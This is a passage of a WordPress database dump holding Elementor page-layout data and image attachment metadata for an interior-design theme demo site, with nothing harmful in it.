content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3445,4799,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3446,4799,'_elementor_pro_version','3.8.1'),(3448,4800,'_wp_attached_file','2023/05/Office-1.jpg'),(3449,4800,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:831;s:4:\"file\";s:20:\"2023/05/Office-1.jpg\";s:8:\"filesize\";i:363219;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Office-1-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19915;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Office-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Office-1-768x709.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55531;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"Office-1-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52836;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"Office-1-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28462;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"Office-1-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33924;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"Office-1-900x473.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49235;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3450,4801,'_wp_attached_file','2023/05/office-2.jpg'),(3451,4801,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:699;s:4:\"file\";s:20:\"2023/05/office-2.jpg\";s:8:\"filesize\";i:438484;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-2-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23570;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14716;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-2-768x596.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:596;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78032;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-2-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83350;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38104;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-2-378x699.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:699;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50987;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-2-900x473.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93991;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3460,4803,'_wp_attached_file','2023/05/office-3.jpg'),(3461,4803,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:20:\"2023/05/office-3.jpg\";s:8:\"filesize\";i:345296;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20664;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13182;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58366;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53469;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28233;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-3-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36485;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-3-900x473.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3462,4804,'_wp_attached_file','2023/05/office-4.jpg'),(3463,4804,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:774;s:4:\"file\";s:20:\"2023/05/office-4.jpg\";s:8:\"filesize\";i:387409;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-4-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25197;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16867;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-4-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70731;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-4-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70862;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-4-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37477;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-4-378x774.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:774;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46455;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-4-900x473.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3464,4805,'_wp_attached_file','2023/05/office-5.jpg'),(3465,4805,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:690;s:4:\"file\";s:20:\"2023/05/office-5.jpg\";s:8:\"filesize\";i:92434;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-5-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5962;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-5-768x518.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:518;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66072;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-5-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75515;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-5-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32586;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-5-378x690.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44925;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-5-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69304;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3466,4806,'_wp_attached_file','2023/05/office-6.jpg'),(3467,4806,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:672;s:4:\"file\";s:20:\"2023/05/office-6.jpg\";s:8:\"filesize\";i:93967;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-6-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13779;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5973;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-6-768x504.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65980;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-6-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78933;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-6-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34166;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-6-378x672.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:672;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47291;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-6-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80613;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3468,4807,'_wp_attached_file','2023/05/office-7.jpg'),(3469,4807,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:599;s:4:\"file\";s:20:\"2023/05/office-7.jpg\";s:8:\"filesize\";i:78464;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"office-7-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"office-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5094;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"office-7-768x449.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56416;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-7-768x599.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58247;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"office-7-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24908;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"office-7-378x599.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26695;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"office-7-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72229;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3470,4808,'_wp_attached_file','2023/05/office-8.jpeg'),(3471,4808,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:991;s:4:\"file\";s:21:\"2023/05/office-8.jpeg\";s:8:\"filesize\";i:102304;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"office-8-300x290.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14628;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"office-8-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5043;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"office-8-768x743.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:743;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72183;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"office-8-768x660.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66240;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"office-8-390x473.jpeg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28420;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"office-8-378x824.jpeg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42904;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"office-8-960x473.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3472,4809,'_wp_page_template','elementor_header_footer'),(3473,4809,'_elementor_edit_mode','builder'),(3474,4809,'_elementor_template_type','wp-page'),(3475,4809,'_elementor_version','3.6.6'),(3476,4809,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding 